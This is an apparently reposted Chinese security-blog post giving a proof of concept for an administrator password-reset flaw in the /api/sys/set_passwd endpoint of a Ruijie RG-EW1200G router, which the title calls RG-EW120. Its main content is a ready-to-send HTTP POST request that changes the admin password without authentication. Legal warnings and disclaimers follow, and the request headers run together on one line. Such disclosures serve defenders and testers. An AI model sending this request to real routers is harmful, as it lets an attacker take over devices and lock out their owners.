锐捷 RG-EW120路由器存在密码重置漏洞 POC

admin 2025年7月9日01:37:49评论20 views字数 743阅读2分28秒阅读模式

产品描述

锐捷网络RG-EW1200G是一款有线无线全千兆双频无线路由器,适合平层家居、别墅、小型店铺、SOHO办公等场景使用。

漏洞描述

系统/api/sys/set_passwd存在逻辑缺陷,远程攻击者可通过该接口任意修改管理员密码实现系统登录。

Poc

POST /api/sys/set_passwd HTTP/1.1Host: Content-Length: 42Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140Content-Type: application/json;charset=UTF-8Origin: Referer: Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close{"username":"web","admin_new":"xxxxx"}

漏洞复现

锐捷 RG-EW120路由器存在密码重置漏洞 POC
小知识

依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。
锐捷 RG-EW120路由器存在密码重置漏洞 POC
声明

本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

原文始发于微信公众号(什么安全):【漏洞复现】锐捷 RG-EW120路由器存在密码重置漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月9日01:37:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷 RG-EW120路由器存在密码重置漏洞 POChttps://cn-sec.com/archives/4233516.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息